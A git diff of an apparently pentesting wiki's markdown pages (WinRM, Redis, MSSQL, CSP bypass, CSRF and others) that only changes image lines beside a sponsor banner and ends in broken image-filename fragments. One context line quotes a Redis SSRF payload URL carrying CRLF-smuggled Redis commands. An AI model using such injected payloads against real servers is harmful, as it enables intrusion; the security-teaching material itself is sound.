index 18995f06b..22967bfa5 100644
--- a/network-services-pentesting/5985-5986-pentesting-winrm.md
+++ b/network-services-pentesting/5985-5986-pentesting-winrm.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -167,7 +167,7 @@ winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -338,7 +338,7 @@ Entry_2:
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md
index af1d16c0c..9b1cbc0a3 100644
--- a/network-services-pentesting/6000-pentesting-x11.md
+++ b/network-services-pentesting/6000-pentesting-x11.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -172,7 +172,7 @@ Now as can be seen below we have complete system access:
* `port:6000 x11`
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/6379-pentesting-redis.md b/network-services-pentesting/6379-pentesting-redis.md
index 084fe508e..fb31f0497 100644
--- a/network-services-pentesting/6379-pentesting-redis.md
+++ b/network-services-pentesting/6379-pentesting-redis.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -154,7 +154,7 @@ HGET
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -340,7 +340,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
index 7e0deb558..851e91d88 100644
--- a/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/network-services-pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -186,7 +186,7 @@ curl http://127.0.0.1:80
* [https://academy.hackthebox.com/module/145/section/1295](https://academy.hackthebox.com/module/145/section/1295)
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index 90f83c929..eba355e1f 100644
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -388,7 +388,7 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -541,7 +541,7 @@ You probably will be able to **escalate to Administrator** following one of thes
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/network-services-pentesting/pentesting-ntp.md b/network-services-pentesting/pentesting-ntp.md
index 9695b0306..f68ec87bf 100644
--- a/network-services-pentesting/pentesting-ntp.md
+++ b/network-services-pentesting/pentesting-ntp.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -99,7 +99,7 @@ Entry_2:
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index d0bd92c75..493c9407e 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -476,7 +476,7 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
Trick from [**here**](https://ctftime.org/writeup/29310).
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -611,7 +611,7 @@ If you know how to exfiltrate info with WebRTC [**send a pull request please!**]
β
-
+
**HackenProof is home to all crypto bug bounties.**
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index 3dcb323b9..d4da9fa39 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -12,7 +12,7 @@
-
+
**HackenProof is home to all crypto bug bounties.**
@@ -190,7 +190,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
 (3).png)
 (3) (1).png)
 (3).png)
 (3) (1).png)
 (2).png)
 (3).png)
 (3) (1).png)
.png)
 (1).png)
 (3) (1).png)
 (3) (1) (1).png)
.png)
 (8).png)
.png)
 (3).png)
 (1).png)
 (1) (2).png)
.png)
 (3).png)
.png)
.png)
.png)